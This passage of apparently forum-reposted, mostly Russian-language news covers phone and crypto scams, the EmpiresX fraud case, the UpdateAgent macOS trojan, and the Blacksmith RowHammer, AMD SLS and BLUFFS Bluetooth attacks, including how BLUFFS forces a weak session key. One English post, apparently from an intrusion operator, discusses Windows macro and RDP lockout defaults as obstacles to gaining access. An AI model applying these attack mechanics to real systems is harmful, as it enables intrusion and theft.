Через некоторое время ему позвонил мужчина, который объяснил суть пассивного
дохода, и уверил, что схема рабочая и абсолютно безопасная.
Молодой человек наблюдал за ростом своего дохода, и уже через 2 недели сумел
вывести первую прибыль – 3 тыс. рублей, что окончательно усыпило бдительность
и стало аргументом в пользу решения «сыграть по-крупному».
Мужчина оформил 3 кредита на 3,5 млн. рублей, взял в долг у дяди 520 тыс. рублей и убедил родителей взять займы на общую сумму 620 тыс. рублей, все деньги он перевел на указанные собеседником счета.
В общей сложности костромич под предлогом игры на бирже лишился более 4,5 млн. рублей.
Джошуа Дэвид Николас, создатель криптовалютной платформы EmpiresX, выманившей у инвесторов около $100 млн, признал себя виновным по одному из пунктов обвинения.
Согласно заявлению на сайте Министерства юстиции США, житель Флориды Джошуа Дэвид Николас (Joshua David Nicholas) называл себя «главным трейдером» платформы EmpiresX. Его сообщники Эмерсон Пирес (Emerson Pires) и Флавио Гонсалвеш (Flavio Goncalves) рассказывали инвесторам, что на площадке используется новейший торговый бот с искусственным интеллектом (ИИ), и обещали ежедневную прибыль в размере 1% от вложенных средств.
В июле прокуратура США предъявила обвинения Николасу и его пособникам. Минюст утверждает, что помимо обмана инвесторов, они занимались незарегистрированной продажей ценных бумаг и отмыванием денег через криптовалюты. Николас признал, что он мошенническим путем продвигал EmpiresX, предоставляя инвесторам ложные сведения о «гарантированных» доходах и торговом боте, которого не существовало. Деньги, полученные от поздних инвесторов, поступали людям, которые успели войти в криптовалютную схему раньше других.
Кроме того, несмотря на заявления о регистрации в регулирующих органах, EmpiresX никогда не обращалась по этому вопросу в Комиссию по ценным бумагам и биржам США (SEC). Учитывая, что Николас признал себя виновным по одному пункту обвинения, ему грозит максимальное наказание в виде пяти лет лишения свободы. Дата вынесения приговора пока не назначена.
«Технологии изменились, но преступность осталась прежней, просто теперь мошенники занимаются незаконной деятельностью в сфере криптовалют. Этот случай должен стать предупреждением для всех, кто пытается незаконно извлечь выгоду, пользуясь доверчивостью инвесторов», – добавил специальный агент службы внутренней безопасности США Энтони Солсбери (Anthony Salisbury).
Ранее Минюст США обратился к регуляторам всего мира, призвав их ужесточить надзор за соблюдением правил борьбы с отмыванием денег (AML) и процедуры «Знай своего клиента» (KYC).

](https://thehackernews.com/2022/08/crypto-miners-using- tox-p2p-messenger.html)
A growing number of cybercriminals have begun using the peer-to-peer instant messaging service Tox as a command-and-control method.
 thehackernews.com
В течение месяца скамеры названивали 75-летней бабке из Москвы под видом сотрудников силовых структур. Запугав бабушку, скамеры выманили у нее все сбережения, которые женщина передавала курьеру, называвшему «пароли». А затем, узнав, что у бабули есть еще вторая квартира, телефонщики убедили ее, что она может быть арестована и ее нужно срочно продать.
По указанию звонивших пенсионерка ничего не говорила своим близким о спасении имущества. Она спокойно совершила сделку по продаже жилья, а полученные деньги отправились в крипту. 12 слов удачно отправились скамеру, который потом тупо вывел их через обменники на карты дропов.
После разговора с родственниками мохнатка поняла, что ее опрокинули аферисты. Общий ущерб составил 25.6 миллиона рублей. Возбуждено дело по ст. 159. Установление лиц стоит на контроле у московской прокуратуры.
I just read a Twitter post by a well-known account that likes to talk about Microsoft news:
__https://twitter.com/x/status/1550061534323384322
I guess they are doing a second U-turn on the macros policy, and once again will be disabling macros by default.
Also, further down he mentions that Windows 11 has a new RDP account lockout policy to limit the number of passwords tried, also set by default. Here's the post where he got that information.
__https://twitter.com/x/status/1549870156771340288
He also mentions this will be backported to win10, server 2012/16/19
These changes have the potential to eliminate a number of potential accesses. Smart and experienced operators will always find a way, but it seems to be getting much harder for the entry-level person to get started in this business.
Исследователи из компании Microsoft предупреждают об эволюции вредоносной программы для macOS — UpdateAgent. По словам специалистов, разработчики постоянно дорабатывают своё детище, которое теперь успешно устанавливает в систему жертвы бэкдор и адваре.
Впервые UpdateAgent попался на глаза экспертам в сентябре 2020 года. С тех пор авторы трояна выпустили несколько новых версий, повышающих качество заражения и расширяющих вредоносные возможности зловреда.
Команда Microsoft 365 Defender Threat Intelligence отметила, что UpdateAgent довольно быстро превратился из обычного инфостилера в распространитель пейлоадов второй стадии атаки. В 2021 году исследователи зафиксировали несколько волн кампаний UpdateAgent.
«В последних атаках, за которыми мы пристально наблюдали, анализируемый вредонос устанавливал в системы жертв крайне устойчивое и скрытное адваре Adload. Также стоит учитывать, что UpdateAgent может загрузить на компьютер и другие опасные программы», — [пишет Microsoft](https://www.microsoft.com/security/blog/2022/02/02/the-evolution- of-a-mac-trojan-updateagents-progression/).
Авторы трояна маскируют его под легитимные приложения вроде софта для просмотра видео и т. п., а потом рекламируют его во всплывающих на сайтах окнах. При этом зловред умеет использовать пользовательские разрешения для своих целей и обходить защитный механизм macOS Gatekeeper.
В последних атаках UpdateAgent использовал облачные среды Amazon S3 и CloudFront для хранения вредоносной составляющей второй ступени. Это было адваре Adload в форме .DMG- и .ZIP-файлов. После установки Adload в систему вредонос задействует технику «человек посередине (man-in-the-middle) и вклинивается в трафик пользователя, внедряя агрессивную рекламу на веб- страницах и в поисковой выдаче.
Напомним, что в октябре прошлого года вредоносу UpdateAgent добавили функции ухода от детектирования.
У жителей Могилевской области за последние 10 дней похитили с карт-счетов более Br24 тыс. Об этом сообщила официальный представитель УСК по Могилевской области Татьяна Старосотникова.
"С 28 ноября по 7 декабря следователями Могилевской области возбуждено 35 уголовных дел по ст.212 (хищение имущества путем модификации компьютерной информации) УК, - отметила Татьяна Старосотникова. - Общая сумма причиненного ущерба потерпевшим составила более Br24 тыс. Территориальными следственными подразделениями проводится комплекс необходимых следственных и иных процессуальных действий, направленный на установление лиц, причастных к совершению данных преступлений".
Один из случаев произошел днем 19 ноября. 29-летней жительнице Осиповичского района в мессенджере Viber позвонил неизвестный и представился сотрудником интернет-магазина "21 век". Он сообщил женщине, что на ее имя составлена заявка о покупке стиральной машинки и от ее имени по доверенности оформлен кредит. В ходе телефонного разговора лжесотрудник интернет-магазина связал женщину со службой техподдержки. И хотя она объясняла, что ничего не заказывала, не брала кредитов и не оформляла никаких доверенностей, общавшийся с ней сотрудник службы техподдержки был настойчив и убедил женщину взять кредит в банке. Следуя рекомендациям, женщина установила программу Anydesk, с помощью которой полученный ею кредит был переведен на другой карт-счет. Не прошло и часа, как ей позвонили из службы техподдержки и сообщили, что на нее снова оформляется кредит. Женщина, находясь в растерянности, оформила очередной кредит в другом банке, который также был переведен с помощью ранее установленной ею программы.
На следующий день история повторилась - и женщина взяла кредит в третьем банке. Всего за два дня она оформила кредиты на сумму свыше Br12 тыс. Предчувствуя неладное, она обратилась в банк, где оформляла первый кредит. И только тогда, когда ей сделали распечатку кредитного договора и периодичности выплат по кредиту, она поняла, что попалась на удочку мошенников.
По факту хищения имущества путем модификации компьютерной информации, совершенного в крупном размере, Осиповичским районным отделом Следственного комитета возбуждено уголовное дело по ч.3 ст.212 УК.
Потерпевшая допрошена, запрошены сведения о движении денежных средств по карт- счетам женщины, осмотрен ее мобильный телефон, зафиксированы и внесены в специализированную базу номера телефонов, с которых звонили злоумышленники.
Правоохранители отмечают, что преступления в сфере высоких технологий по- прежнему остаются актуальными и злободневными. Несмотря на то, что схема стара и давно знакома, доверчивые граждане продолжают попадаться на уловки мошенников. Применяя агрессивные психологические методы воздействия, злоумышленники не оставляют жертве время на раздумья. Представляясь по телефону сотрудником банка, они под разными предлогами выманивают у держателя платежной карты конфиденциальную информацию и побуждают его совершать необдуманные поступки.
Большинство таких звонков осуществляется посредством мессенджера Viber, реже WhatsАpp, звонки также поступают с подменных номеров банков и других структур. Во время разговора злоумышленники просят установить специальные приложения для лучшей защиты. Это не что иное, как программы удаленного доступа, которые помогают похитить не только все имеющиеся деньги, но и оформить в мобильном приложении кредит, а затем перевести средства на другой банковский счет.
В Республике Марий Эл в дежурную часть МО МВД России «Волжский» с заявлением о мошенничестве обратилась 33-летняя местная жительница, которая рассказала, что у неё обманом похищены 140 тысяч рублей.
Оказалось, что в социальной сети она познакомилась с мужчиной, который представлялся офицером корейской армии. С его слов, он проходил службу в Йемене.
Кавалер быстро наладил доверительные отношения с женщиной и вскоре сообщил, что собирается расторгнуть контракт и приехать в Россию к Новому году. Но до приезда он пожелал сделать возлюбленной подарок в виде дорогостоящего телефона и золотых украшений, а также денег в сумме 900 тысяч долларов США. Всё это он якобы намеревался выслать заранее.
Узнал у женщины её адрес и сказал, что доставку оплатит сам. Однако вскоре потерпевшей позвонил курьер, который попросил оплатить таможенную пошлину в размере 140 тысяч рублей. Женщина перечислила на указанные реквизиты требуемую сумму. Позже выяснилось, что необходимо оплатить ещё страховку и накладные расходы. Тогда-то гражданка поняла, что её обманывают.
В ходе проведения оперативно-розыскных мероприятий сотрудники уголовного розыска установили подозреваемого в совершении преступления и задержали его в Московской области. Им оказался 41-летний гражданин Нигерии. Он исполнял роль и за интернет-кавалера, и за курьера.
Во время обыска по месту жительства задержанного оперативники обнаружили и изъяли два ноутбука, мобильный телефон, банковские карты, сим-карты и три паспорта иностранного гражданина, два из которых с признаками подделки.
По факту мошенничества возбуждено уголовное дело. Подозреваемый заключён под стражу.
В настоящее время проводятся дальнейшие оперативно-розыскные мероприятия и следственные действия, направленные на выявление дополнительных эпизодов противоправной деятельности фигуранта.
Жителя Кобринского района обвиняют в финансировании экстремистской деятельности и использовании вредоносных компьютерных программ. Об этом сообщает БЕЛТА со ссылкой на официального представителя управления Следственного комитета по Брестской области Романа Зармаева.
Фигурантом уголовного дела стал 36-летний мужчина. Следователи выяснили, что в августе 2020 года он поддался на призывы деструктивных интернет-ресурсов к сбору денег на поддержку задержанных за участие в уличных беспорядках. Обвиняемый перевел $60 на счет экстремистского формирования, нацеливавшегося на захват власти и оправдывавшего уличную преступность. Кроме того, в марте 2023 года мужчина активировал на своем компьютере вредоносные программы, которые провоцировали DDoS-атаки на различные интернет-ресурсы.
Правоохранители выяснили личность злоумышленника и задержали его. "При осмотре его компьютерной техники и смартфона обнаружены цифровые следы преступлений: сведения о переводе денег и файлы вредоносных программ. В ходе следствия мужчина раскаялся в содеянном и дал признательные показания. Желая загладить вред, причиненный в результате финансирования экстремистской деятельности, он перевел Br2 тыс. на благотворительный счет специализированной общеобразовательной школы-интерната", - рассказал Роман Зармаев.
Жителю Кобринского района предъявили обвинение по ст.361-2 (финансирование деятельности экстремистского формирования) и ч.1 ст.354 (использование вредоносных компьютерных программ) УК. С санкции прокурора его заключили под стражу.
Олимпийский комитет США порекомендовал спортсменам своей страны отказаться от смартфонов во время Олимпиады в Пекине из-за угрозы взлома.
Гаджеты могут быть взломаны с помощью приложения My2022, которое должны установить все гости Игр в Китае. Сообщается, что в Америке призывают пользоваться дешевыми телефонами, которые по приезду домой можно будет выбросить. Собственные гаджеты рекомендуют оставить дома.
С такими же предупреждениями для своих спортсменов выступили в Великобритании, Канаде и Норвегии.
Олимпийские игры – 2022 пройдут с 4 по 20 февраля в китайской столице. Всего на Играх будет разыграно 109 комплектов медалей в 15 видах спорта.
Группа исследователей из Швейцарской высшей технической школы Цюриха, Амстердамского свободного университета и компании Qualcomm опубликовали новый метод атаки класса RowHammer, позволяющий изменить содержимое отдельных битов динамической оперативной памяти (DRAM). Атаке присвоено кодовое имя Blacksmith и идентификатор CVE-2021-42114. Проблеме подвержены многие чипы DDR4, снабжённые защитой от ранее известных методов класса RowHammer. Инструментарий для тестирования своих систем на подверженность уязвимости опубликован на GitHub.
Напомним, что атаки класса RowHammer позволяют исказить содержимое отдельных битов памяти путём цикличного чтения данных из соседних ячеек памяти. Так как память DRAM представляет собой двухмерный массив ячеек, каждая из которых состоит из конденсатора и транзистора, выполнение непрерывного чтения одной и той же области памяти приводит к флуктуации напряжения и аномалиям, вызывающим небольшую потерю заряда соседних ячеек. Если интенсивность чтения большая, то соседняя ячейка может потерять достаточно большой объём заряда и очередной цикл регенерации не успеет восстановить её первоначальное состояние, что приведёт к изменению значения сохранённых в ячейке данных.
Для защиты от RowHammer производители чипов предложили механизм TRR (Target Row Refresh), который защищает от искажения ячеек в соседних строках, но так как защита основывалась на принципе "безопасность через неясность (security by obscurity), она не решала проблему в корне, а защищала лишь от известных частных случаев, что позволяло легко находить пути обхода защиты. Например, в мае компания Google предложила метод Half-Double, на который не действовала защита TRR, так как при атаке затрагивались ячейки, напрямую не прилегающие к целевой.
Новый метод Blacksmith предлагает иной способ обхода защиты TRR, основанный на неоднородном обращении с разной частотой к двум или более строкам-агрессорам для вызова утечки заряда. Для определения шаблона обращения к памяти, приводящего у течке заряда, разработан специальный fuzzer, автоматически подбирающий параметры атаки для конкретного чипа, варьируя порядок, интенсивность и систематичность обращения к ячейкам.
Подобный поход, не связанный с воздействием на одни и те же ячейки, делает неэффективным текущие методы защиты TRR, которые в том или ином виде сводятся к подсчёту числа повторяющихся обращений к ячейкам и при достижении определённых величин инициировании перезарядки соседних ячеек. В Blacksmith шаблон доступа размазывается сразу на несколько ячеек c разных сторон от целевой, что позволяет добиться утечки заряда не достигая пороговых величин.
Метод оказался значительно эффективнее ранее предложенных способов обхода TRR
В общем виде предполагается, что метод Blacksmith применим к 94% из всех DRAM- чипов, имеющихся на рынке, но по заявлению исследователей, некоторые чипы более уязвимы и проще для атаки, чем другие. Применение в чипах кодов коррекции ошибок (ECC) и удвоения частоты обновления памяти не обеспечивает полной защиты, но усложняет эксплуатацию. Примечательно, что проблема не может быть блокирована в уже выпущенных чипах и требует реализации новой защиты на аппаратном уровне, поэтому атака останется актуальной ещё многие годы.
В качестве практических примеров приведены методы применения Blacksmith для изменения содержимого записей в таблице страниц памяти (PTE, page table entry) для получения привилегии ядра, повреждения хранящегося в памяти открытого ключа RSA-2048 в OpenSSH (можно привести открытый ключ в чужой виртуальной машине к соответствию закрытому ключу атакующего для подключения к VM жертвы) и обхода проверки полномочий через модификацию памяти процесса sudo для получения полномочий root. В зависимости от чипа для изменения одного целевого бита требуется от 3 секунд до нескольких часов проведения атаки.
Греческие хакеры похвастались взломом министерство образования Македонии
Греческие хакеры, ведущие в социальной сети Twitter аккаунт с ником «Сильная греческая армия"(Powerful greek army) 7 февраля похвастались, что сумели взломать министерство образования и науки Северной Македонии.
Якобы им удалось получить доступ к камерам безопасности. В македонском министерстве не подтвердили информацию о нападении.
Публикации с аккаунта преступников в Twiter предполагают, что они проводили кибератаку на МИД Северной Македонии и Национальный банк страны — отчет о своих действиях они помещали в сеть. Доступ к сайтам правительственных агентств восстановлен.
Ранее ИА REGNUM сообщало о кибератаках на министерство здравоохранения и аккаунт министра здравоохранения Северной Македонии в социальных сетях.
В структуре Управления МВД России по Астраханской области создан отдел по борьбе с противоправным использованием информационно-коммуникационных технологий (ОБК – отдел по борьбе с киберпреступностью).
Необходимость создания подразделения связана с возрастающим количеством компьютерных атак, дистанционных хищений денежных средств, активным развитием противоправной цифровой индустрии и даркнета. Противоправные деяния, совершенные с использованием IT-технологий, представляют угрозу гражданам, правопорядку и национальной безопасности.
Основными задачами подразделения являются предупреждение, выявление, пресечение и раскрытие преступлений и иных правонарушений в сфере IT- технологий. Киберолицейские осуществляют анализ данных, содержащихся в информационно-телекоммуникационных сетях, в целях выявления запрещенного контента и противодействия преступности.
В октябре «цифровые полицейские» совместно с коллегами из регионального УФСБ задержали астраханца, подозреваемого в нарушении правил эксплуатации средств хранения, обработки и передачи охраняемой компьютерной информации, содержащейся в критической информационной инфраструктуре Российской Федерации.
Следственной частью по расследованию уголовных дел, совершенных в составе организованной преступной группы, Следственного Управления УМВД России по Астраханской области возбуждено уголовное дело по ч.4 ст. 274.1 УК РФ.
По версии следствия, подозреваемый, являясь системным администратором отдела технического и программного обеспечения астраханского медицинского учреждения, осуществил подключение к ведомственной информационно-аналитической системе используя сетевое соединение с VPN-сервисом и тем самым завладел персональными данными пациентов медицинских организаций Астраханской области.
Имея доступ к массиву данных на протяжении нескольких лет, он завладевал сведениями об усопших и, используя программу для удаленного доступа к сервису, предавал сведения об умерших третьим лицам за ежемесячное денежное вознаграждение. Возможно, информация передавалась предпринимателям в области ритуальных услуг в коммерческих целях.
Расследование уголовного дела продолжается. Следователям и оперативникам предстоит установить всех возможно причастных к совершению противоправных деяний лиц.
За совершение данного противоправного деяния законом предусмотрено наказание в виде лишения свободы на срок до восьми лет с лишением права занимать определенные должности.
source: 30.мвд.рф/news/item/43862863
В Удмуртской Республике Следственным управлением УМВД России по г. Ижевску окончено расследование уголовного дела по обвинению 26-летнего ранее судимого безработного местного жителя в серии дистанционных мошенничеств.
По версии следствия, молодой человек с марта 2022 по февраль текущего года на одном из интернет-сервисов размещал объявления о продаже различных вещей по низким ценам. В ходе переписки с потенциальными покупателями он просил перевести на свою банковскую карту полную предоплату товара. После получения денег обвиняемый свои обязательства не исполнял, предлагаемую продукцию не высылал, переставал выходить на связь и блокировал аккаунты. Таким образом ему удалось похитить 267 тысяч рублей у 33 потерпевших.
В результате оперативно-розыскных мероприятий злоумышленник был задержан сотрудниками Управления уголовного розыска МВД по Удмуртской Республике. Выяснилось, что похищенные денежные средства он тратил на личные нужды.
В настоящее время материалы уголовного дела, возбуждённого по ч. 1 и 2 ст. 159 Уголовного кодекса Российской Федерации, с обвинительным заключением направлены в суд. Фигурант находится под домашним арестом.
Новые системы будут использоваться в роботах-помощниках по дому или камерах от первого лица для навигации по окружающему миру.
Команда специалистов компании Facebook занимается новым исследовательским проектом по разработке систем на базе искусственного интеллекта, способных постоянно анализировать жизнь людей с помощью видео и помогать им в повседневных задачах. Исследователи Facebook выделили ряд навыков, которые компания хочет развивать в этих системах, включая «эпизодическую память» (ответы на такие вопросы, как «где я оставил свои ключи?») и «аудиовизуальную диаризацию» (запоминание, кто что и когда сказал).
Исследовательский проект Facebook под названием Ego4D состоит из двух основных компонентов: открытого набора данных видеороликов и ряда тестов, с которыми, по мнению Facebook, системы искусственного интеллекта смогут справиться в будущем. Набор данных является крупнейшим в своем роде из когда-либо созданных, и Facebook сотрудничал с 13 университетами по всему миру для сбора сведений. В общей сложности около 3205 часов видеозаписи были записаны 855 пользователями в девяти странах. Участники носили камеры GoPro и очки дополненной реальности, чтобы записывать видео любого характера, включая строительные работы, выпечку, игры с домашними животными и общение с друзьями. Все кадры были анонимизированы, что включало размытие лиц прохожих и удаление любой личной информации.
Второй компонент Ego4D — серия тестов или задач, которые исследователям необходимо было решить с помощью систем искусственного интеллекта, обученных на наборе данных. Задачи включали следующие элементы: эпизодическую память (что и когда произошло, прогнозирование (что нужно делать дальше), манипуляцию руками и предметами, аудиовизуальный дневник (кто и когда что было сказано), социальное взаимодействие (кто с кем взаимодействует).
Как сообщили представители компании, обученные на Ego4D системы однажды могут использоваться в роботах-помощниках по дому или камерах от первого лица для навигации по окружающему миру.
Такие амбиции имеют огромное значение для конфиденциальности. Эксперты по конфиденциальности уже обеспокоены тем, как очки дополненной реальности от Facebook позволят владельцам скрытно записывать информацию о людях. Такие опасения будут только усугубляться, если будущие версии оборудования не только будут записывать кадры, но и анализировать и расшифровывать их, превращая пользователей в ходячие системы наблюдения.
source: about.fb.com/news/2021/10/teaching-ai-to-view-the-world-through-your- eyes/
Проект Grsecurity опубликовал детали и демонстрацию метода атаки для новой [уязвимости](https://www.amd.com/en/corporate/product-security/bulletin/amd- sb-1026) ([CVE-2021-26341](https://security- tracker.debian.org/tracker/CVE-2021-26341)) в процессорах AMD, связанной со спекулятивным выполнением инструкций после операций безусловного прямого перехода. В случае успешного проведения атаки уязвимость позволяет определить содержимое произвольных областей памяти. Например, исследователями подготовлен эксплоит, позволяющий определить раскладку адресов и обойти механизм защиты KASLR (рандомизация памяти ядра) через выполнение непривилегированного кода в подсистеме ядра ePBF. Не исключены и другие сценарии атак, которые могут привести к утечке содержимого памяти ядра.
Уязвимость позволяет создать условия, при которых процессор в ходе упреждающего выполнения спекулятивно обработает инструкцию, следующую в памяти сразу за командой перехода (SLS, Straight Line Speculation). При этом подобная оптимизация срабатывает не только для операторов условного перехода, но и для инструкций подразумевающих прямой безусловный переход, таких как JMP, RET и CALL. Следом за инструкциями безусловного перехода могут размещаться в том числе произвольные данные, не предназначенные для исполнения. После определения того, что переход не подразумевает выполнение следующей инструкции, процессор просто откатывает состояние и не учитывает спекулятивное выполнение, но след от выполнения инструкции остаётся в общем кэше и доступен для анализа с использованием методов извлечения по сторонним каналам.
Как и при эксплуатации уязвимости Spectre-v1 для осуществления атаки требуется наличие в ядре определённых последовательностей инструкций (гаджетов), приводящих к спекулятивному выполнению. Блокирование уязвимости при этом сводится к выявлению подобных гаджетов в коде и добавлению в них дополнительных инструкций, блокирующих спекулятивное выполнение. Условия для спекулятивного выполнения также могут быть созданы при помощи непривилегированных программ, выполняемых в виртуальной машине eBPF. Для блокирования возможности конструирования гаджетов при помощи eBPF рекомендуется запретить непривилегированный доступ к eBPF в системе ("sysctl -w kernel.unprivileged_bpf_disabled=1").
Уязвимость затрагивает процессоры на базе микроархитектуры Zen1 и Zen2, включая первое и второе поколения процессоров AMD EPYC и AMD Ryzen Threadripper, а также процессоры AMD Ryzen 2000/3000/4000/5000, AMD Athlon, AMD Athlon X, AMD Ryzen Threadripper PRO и APU серии A. Для блокирования спекулятивного выполнения инструкций [рекомендовано](https://www.amd.com/system/files/documents/software- techniques-for-managing-speculation.pdf) вызывать инструкции INT3 или LFENCE после операций ветвления (RET, JMP, CALL).

В Швейцарии в возрасте 89 лет скончался профессор Высшей технической школы
Цюриха Никлаус Вирт — один из первопроходцев в области прикладной математики и
информационных технологий, наиболее известный как создатель языка
программирования Pascal.
В некрологе, опубликованном на сайте университета, где профессор Вирт
проработал более 30 лет, [сообщается](https://ethz.ch/en/news-and-events/eth-
news/news/2024/01/computer-pioneer-niklaus-wirth-has-died.html), что ученый
скончался еще 1 января, в кругу семьи.
«Работа и энтузиазм Вирта сыграли фундаментальную роль в развитии современного
мира информационных технологий, — говорится в сообщении. — Его достижения в
этой сфере и по сей день оказывают решающее влияние на информатику и новые
поколения программистов».
Церемония прощания с профессором Виртом назначена на четверг, 11 января, и
пройдет в Цюрихе, в зале часовни Гроссмюнстер на территории старого города,
где расположен местный культурный центр.
В Швейцарии Вирта по праву считают одним из отцов-основателей информатики и
сферы компьютерных технологий в целом.
Докторскую диссертацию на эту тему он защитил еще в 1963 году в калифорнийском
Беркли, после чего вернулся на родину, превратив Цюрих в один из ведущих
мировых центров информационных технологий.
Однако за пределами страны он известен в первую очередь как создатель
многочисленных популярных языков программирования, самый известный из которых
— алгоритмический язык Pascal.
Созданный в 1970 году, Pascal был простым (интуитивно понятным), элегантным и
очень гибким средством общения с вычислительными машинами, что позволило ему
быстро стать самым распространенным коммерческим языком программирования в
мире, который в обязательном порядке изучали студенты в десятках стран.
В 1984 году за его разработку Вирт был удостоен престижной премии Тюринга -
высшей профессиональной награды в области информатики.
Впоследствии на основе Pascal были созданы и другие алгоритмические языки
программирования.
Организаторы латвийской конференции разработчиков годами создавали фейковых девушек, которые якобы должны были выступать на мероприятии. Так они хотели повысить инклюзивность.
Конференция DevTernity проходит несколько лет, и каждый раз там должны были выступать девушки-разработчицы. То старший инженер «Ватсапа», то мастер программного обеспечения CoinBase, то специалист по разработке в Ethereum. Но каждый раз случалось неудача — и на конференции девушки не выступали. Недавно стало известно почему. Этих девушек просто не существовало.
Организаторов выставки обвинили в том, что они искусственно создали аккаунты этих девушек в соцсетях и анонсировали их выступления, чтобы похвалиться инклюзивностью. Мол, а у нас IT-девушки выступают, а у вас? Так организатор конференции Эдуард Сизовс создал фейковую разработчицу Юлию Кирсину. Сизовс сделал ей фейковую страничку в «Инстаграме», нафотошопил туда фоток и поддерживал дискуссию с пользователями в комментариях. Эдуард немного напортачил: например, на одной фотографии Кирсина залогинена под его именем — но в целом всё выглядело по-настоящему.
В итоге фейковая инклюзивность погубила всю конференцию — после скандала настоящие участники конференции начали отказываться от участия, и, как пишут СМИ, в конце концов DevTernity отменили.
Даниэле Антониоли (Daniele Antonioli), исследователь безопасности Bluetooth, ранее разработавший техники атак BIAS, BLUR и KNOB, выявил две новые уязвимости ([CVE-2023-24023](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2023-24023)) в механизме согласования сеансов Bluetooth, [затрагивающие](https://www.bluetooth.com/learn-about- bluetooth/key-attributes/bluetooth-security/bluffs-vulnerability/) все реализации Bluetooth, поддерживающие режимы защищённого сопряжения "Secure Connections" и "Secure Simple Pairing", соответствующие спецификациям Bluetooth Core 4.2-5.4. В качестве демонстрации практического применения выявленных уязвимостей разработано 6 вариантов атак, позволяющих вклиниться в соединение между ранее сопряжёнными Bluetooth- устройствами. Код с реализацией методов атаки и утилиты для проверки наличия уязвимостей опубликованы на GitHub.
Уязвимости были выявлены в ходе анализа описанных в стандарте механизмов достижения прямой секретности (Forward and Future Secrecy), противодействующих компрометации сеансовых ключей в случае определения постоянного ключа (компрометация одного из постоянных ключей не должна привести к расшифровке ранее перехваченных или будущих сеансов) и повторному использованию сеансовых ключей (ключ от одного сеанса не должен быть применим к другому сеансу). Найденные уязвимости позволяют обойти указанную защиту и повторно использовать ненадёжный сеансовый ключ в разных сеансах. Уязвимости вызваны недоработками в базовом стандарте, не специфичны для отдельных Bluetooth-стеков, и проявляются в чипах различных производителей.
Предложенные методы атак реализуют разные варианты организации спуффинга классических (LSC, Legacy Secure Connections на базе устаревших криптографических примитивов) и защищённых (SC, Secure Connections на базе ECDH и AES-CCM) Bluetooth-соединений между системой и периферийным устройством, а также организации MITM-атак для соединений в режимах LSC и SC. Предполагается, что все реализации Bluetooth, соответствующие стандарту, подвержены тем или иным вариантам атаки BLUFFS. Работа метода продемонстрирована на 18 устройствах от таких компаний, как Intel, Broadcom, Apple, Google, Microsoft, CSR, Logitech, Infineon, Bose, Dell и Xiaomi.
Суть уязвимостей сводится к возможности без нарушения стандарта принудительно откатить соединение на использование старого режима LSC и ненадёжного короткого сессионного ключа (SK), через указание в процессе согласования соединения минимально возможной энтропии и игнорируя содержимое ответа с параметрами аутентификации (CR), что приводит к генерации сессионного ключа на основе постоянных входных параметров (сессионный ключ SK вычисляется как KDF от постоянного ключа (PK) и согласованных во время сеанса параметров). Например, атакующий в ходе MITM-атаки может заменить в процессе согласования сеанса параметры AC и SD на нулевые значения, а энтропию SE выставить в значение 1, что приведёт к формированию сессионного ключа SK с фактической энтропией в 1 байт (штатный минимальный размер энтропии составляет 56 байт, что по уровню надёжности сопоставимо с подбором ключей DES).
Если атакующему в процессе согласования соединения удалось добиться использования более короткого ключа, далее он может при помощи подбора (brute force) определить постоянный ключ (PK), используемый для шифрования и добиться расшифровки трафика между устройствами. Так как в ходе MITM-атаки можно инициировать использование одного и того же ключа шифрования, если данный ключ будет подобран, то его можно задействовать и для расшифровки всех прошлых и будущих сеансов, перехваченных атакующим.
Для блокирования уязвимостей исследователем предложено внести в стандарт изменения, расширяющие протокол LMP и меняющие логику использования KDF (Key Derivation Function) при формировании ключей в режиме LSC. Изменение не нарушает обратную совместимость, но приводит к включению расширенной LMP- команды и необходимости отправки дополнительных 48 байтов. Организация Bluetooth SIG, отвечающая за разработку стандартов Bluetooth, в качестве меры защиты предложила отклонять соединения по шифрованному каналу связи с ключами, размером до 7 байт. Реализациям, всегда применяющим уровень Security Mode 4 Level 4, рекомендуется отклонять соединения с ключами, размером до 16 байт.
В полицию с заявлением обратился 25-летний житель Волгоградской области, который сообщил, что у него обманом похищено более 40 тысяч рублей. Из заявления потерпевшего следует, что денег он лишился, когда решил воспользоваться сайтом интим-услуг.
Полицейские установили причастность к мошенничеству 22-летнего жителя г. Коломны Московской области. Молодой человек создал в сети Интернет сайт с объявлениями о предоставлении услуг сексуального характера в разных регионах России. В анкетных данных злоумышленник использовал скачанные из сети фотографии.
Сначала он общался с клиентами от имени девушек, имитируя женский голос. После того, как получал предоплату, перезванивал, представляясь владельцем салона, и сообщал, что из-за действий гражданина произошёл технический сбой в системе, угрожал проблемами и распространением порочащих сведений и требовал перевести ещё денег.
Следователем отдела полиции № 6 Управления МВД России по г. Волгограду подозреваемому предъявлено обвинение в совершении преступления, предусмотренного ч. 2 ст. 159 Уголовного кодекса Российской Федерации. Он задержан в порядке ст. 91 УПК РФ.
В настоящее время оперативники устанавливают его причастность к совершению других аналогичных преступлений.
Меньше чем за неделю трое жителей Солигорска - электрослесарь, бухгалтер и неработающая горожанка - пополнили ряды жертв киберпреступлений, лишившись крупных сумм денег. Об этом сообщили в УВД Минского облисполкома.
Электрослесарь и бухгалтер проявили невнимательность при переходе по ссылкам и лишились Br1,3 тыс. и Br1,1 тыс. соответственно: вместо интернет-банкинга они посетили сайты-фальшивки. Неработающая горожанка поучаствовала в фальшивой спецоперации по изобличению мошенников. Это обошлось ей не дешево - женщина лишилась Br2,1 тыс.
Витебчанин изготавливал порноматериалы и распространял их в соцсетях и мессенджерах за вознаграждение, его задержали сотрудники наркоконтроля Первомайского РОВД Витебска. Об этом корреспонденту БЕЛТА сообщили в УВД Витебского облисполкома.
Псевдофотографа витебские оперативники задержали в Минске. Для своей преступной деятельности 33-летний мужчина организовал в столице фотостудию. Он приглашал девушек на откровенные фотосессии, говоря, что собирает профессиональное портфолио, и те соглашались быть моделями. В действительности витебчанин продавал снимки на различных сайтах и в мессенджерах, получая прибыль таким обманным путем.
Правоохранители обнаружили по месту жительства лже-фотографа специализированную технику для изготовления материалов категории 18+. В ходе оперативных действий сотрудники милиции удалили пять цифровых ресурсов в интернете, где размещал свою нелегальную продукцию мужчина, и тем самым прекратили их преступную деятельность в Беларуси.
В отношении витебчанина следователи возбудили уголовное дело за изготовление и распространение порноматериалов.
В один день двое минчан обратились в Центральное РУВД столицы с заявлениями, что стали жертвами мошенников при аренде жилья в интернете. Женщина внесла предоплату за аренду дома с купелью, а мужчина за съем квартиры. Об этом сообщили в ГУВД Мингорисполкома.
